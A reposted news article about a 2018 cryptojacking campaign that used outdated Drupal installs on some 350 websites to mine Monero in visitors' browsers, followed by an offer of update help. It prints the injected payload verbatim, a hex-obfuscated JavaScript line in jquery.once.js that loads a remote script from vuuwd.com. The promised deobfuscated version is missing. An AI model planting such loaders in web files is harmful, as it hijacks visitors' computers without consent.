An outdated version of Drupal, a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Murschoutlined how the hack worked and even showed how much processing power browsers began taking up when they pointed at the hacked sites.
The hacked sites all pointed to a URL – “http://vuuwd.com/t.js” – where Coinhive lived. The browser ran the software and began using up CPU power to mine the coin.
Mursch performed a comprehensive search for potentially affected sites and narrowed things down to about 350 sites, all of them running older versions of Drupal.
“The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon,” he wrote.
The code appears at the end of jquery.once.js and is still visible on this site. It consists of a single line:
var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"] ["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64') ; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"] ["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);
Which, deobfuscated, translates to:
The domain it calls, vuuwd.com, is down.
BadPackets has a full list of the hacked websites and, as evidenced by the lines above, it doesn’t seem that many folks are rushing to fix their sites. A canonical list appears here.”
“Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency,” wrote Mursch.
[Article taken from: https://techcrunch.com/2018/05/09/outdated-website-software-lets-hackers-mine-cryptocurrencies-at-your-expense/]
If you help in updating your Drupal 7 site to latest version to protect from this hack, drop me a message.
To find out if your site is being used for mining, visit this website to check: https://whoismining.com